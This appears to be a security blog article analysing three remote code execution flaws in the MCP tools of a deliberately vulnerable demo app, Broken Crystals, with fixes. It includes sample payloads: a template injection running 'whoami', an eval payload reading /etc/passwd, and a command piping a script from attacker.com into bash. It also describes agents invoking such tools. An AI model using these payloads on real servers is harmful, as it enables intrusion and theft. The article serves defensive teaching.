Table of Contents
- Introduction
- Remote Code Execution via render.
- Arbitrary Code Execution via process_numbers
- OS-Level Code Execution via spawn_process
- What These Three Paths Have in Common
- How to Prevent Code Execution Through MCP
- Conclusion
Introduction
MCP endpoints are often described as a safe abstraction layer for AI agents – a way to define clear boundaries between what agents can call and what they cannot. But when those boundaries wrap unsafe code execution patterns, they become something else entirely: a structured attack surface for remote code execution.
Broken Crystals demonstrates this risk at scale. Its MCP endpoint exposes tools designed to render content, process data, and execute system operations. Each tool sounds like a legitimate business function. In practice, there are three different pathways to arbitrary code execution on the server.
The critical insight is this: exposing code execution behavior through an agent-callable interface does not make it safer. It makes it more dangerous. Once a tool is documented, discoverable, and invocable through MCP, an attacker no longer needs to find a hidden route or exploit a complex dependency chain. The execution primitive is already available, and the only question is how to invoke it.
Three of the most exploitable tools in Broken Crystals are render, process_numbers, and spawn_process. They look like utility functions. In reality, they create three different paths to running arbitrary code on the server.
1. Remote Code Execution via render
The render tool is exposed as a public MCP capability. Its contract appears straightforward: accept a template string and return rendered output. Under the hood, though, it passes the user-supplied template directly into a server-side rendering engine without sanitization.
That design turns the MCP tool into a code execution primitive. Instead of restricting the caller to a fixed template with predefined variables, it lets the caller decide what template syntax gets executed. For example, the tool can be called with a template string containing server-side template injection payloads like {{ import(‘os’).popen(‘whoami’).read() }} or equivalent syntax for the underlying engine, and the response comes back with the command output embedded in the rendered result.
This is a complete remote code execution vulnerability, but MCP makes it frictionless. An AI agent, attacker, or compromised integration does not need to understand the backend rendering engine in detail or find an obscure request parameter. The tool is already documented, the MCP interface is already initialized, and calling it requires only knowing the tool name and passing a malicious template.
The fix is not to “validate the template input more carefully.” It is to stop executing user-supplied code as templates at all. MCP tools should accept structured business parameters – like template names and variable dictionaries—not raw code that will be evaluated server-side..
2. Arbitrary Code Execution via process_numbers
If render shows how MCP can enable code execution through template injection, process_numbers shows how it can happen through JavaScript evaluation.
In Broken Crystals, process_numbers is an authenticated MCP tool designed to transform numeric arrays. The implementation accepts a user-supplied JavaScript function string, passes it to eval(), and executes it in the server context. Even though the tool name and description suggest it handles only numeric operations. In reality, it executes arbitrary JavaScript in the server context.
An attacker with MCP access can call this tool with a payload like function(arr) { require(‘child_process’).execSync(‘cat /etc/passwd’); return arr; } or similar JavaScript that accesses the full Node.js runtime. The function runs with the privileges of the server process, and any file it can read, any external command it can invoke, or any service it can reach becomes accessible.
This is a common failure mode in AI integrations that accept dynamic code. Teams assume that wrapping the code execution in a tool definition somehow makes it controlled. But once the tool is exposed through MCP, that assumption breaks down. An agent or attacker who can call the tool can escalate to full system compromise.
The lesson is straightforward: never accept code to be evaluated as user input, especially not through an agent-facing interface. If a tool must perform dynamic operations, it should accept declarative parameters that map to a fixed set of safe operations, not arbitrary code that runs in the server context.
3. OS-Level Code Execution via spawn_process
The most direct code execution vulnerability in the MCP layer is spawn_process.
Broken Crystals exposes a utility tool that accepts a command string and optional arguments, then executes them as a system process. The tool returns the process output. The implementation passes these parameters directly to a process spawning function without filtering or restricting the command set.
This is classic OS command injection. An attacker can call spawn_process with arbitrary shell commands—for example, “command”: “curl attacker.com/malware.sh | bash” downloads and executes a malicious script on the server in a single call. The MCP interface does nothing to prevent or detect these calls. The command executes with the privileges of the application server, potentially including filesystem write access, network outbound permissions, and the ability to modify system state.
That matters because system process execution is rarely sandboxed in real environments. A tool like this can delete files, exfiltrate data, modify configurations, establish reverse shells, or deploy malware. Once command execution is available through an agent-facing interface, the MCP server has effectively become a remote code execution endpoint.
The right fix is to avoid exposing raw system command execution through MCP entirely. If process invocation is necessary for legitimate business logic, it should be wrapped in a whitelist: predefined commands with fixed argument positions, no dynamic command names, and no shell metacharacter expansion.
What These Three Paths Have in Common
These vulnerabilities are different technically, but they share the same architectural problem: MCP is wrapping code execution primitives in a discoverable interface built for automation.
render leaks through template injection. process_numbers leaks through JavaScript evaluation. spawn_process leaks through command-line execution. In each case, the underlying vulnerability – server-side code execution- is familiar. What changes with MCP is the delivery mechanism. Dangerous functionality becomes easier to find, easier to invoke, and easier to chain into larger attack flows.
An agent that can call render can compromise the server. An agent that can call process_numbers can steal secrets. An agent that can call spawn_process can take full control. From a defensive perspective, the critical difference between these tools and a hidden vulnerability in the backend is that these tools are part of the published MCP contract. Testing them is part of the standard integration flow.
That is why MCP endpoints need their own code execution review, not just inherited trust from the APIs behind them. Once a tool is published to an agent, it becomes part of the attack surface.t.
How to Prevent Code Execution Through MCP
Start with the basics, but apply them at the MCP layer itself.
Do not expose template engines as tool parameters. Do not accept code to be evaluated as user input. Do not expose raw system command execution. Treat every tool definition as a privilege decision, every MCP session as its own trust boundary, and every agent invocation as a potential attack.
More specifically: if a tool sounds like it “executes” something – whether it is rendering, processing, spawning, or evaluating – it is a red flag. Tools should describe high-level business operations, not low-level code execution. If you need dynamic behavior, implement it as fixed code paths, not as user-supplied instructions that the tool then runs.
Most importantly, test MCP directly for code execution paths. Broken Crystals is valuable because it demonstrates these vulnerabilities end-to-end: tool enumeration, argument construction, invocation, execution, and output capture. That is the level where real agent security problems appear – not in isolation, but in the actual tool-calling flow.
Conclusion
Code execution vulnerabilities through MCP do not require a new class of AI-specific attack. They happen when existing dangerous behavior is exposed through an interface designed for discovery, automation, and chained execution. That makes familiar weaknesses far more practical to exploit.
For teams adopting MCP, the takeaway is clear: treat code execution as a special case in agent-facing integrations. If a tool can execute code of any kind, it should not be exposed through MCP at all. Review what your tools execute, eliminate unnecessary execution primitives, and injection test carefully.
If security validation stops at the underlying API layer and does not extend to the MCP tools themselves, the most critical risks may still be sitting in the agent-facing interface above it.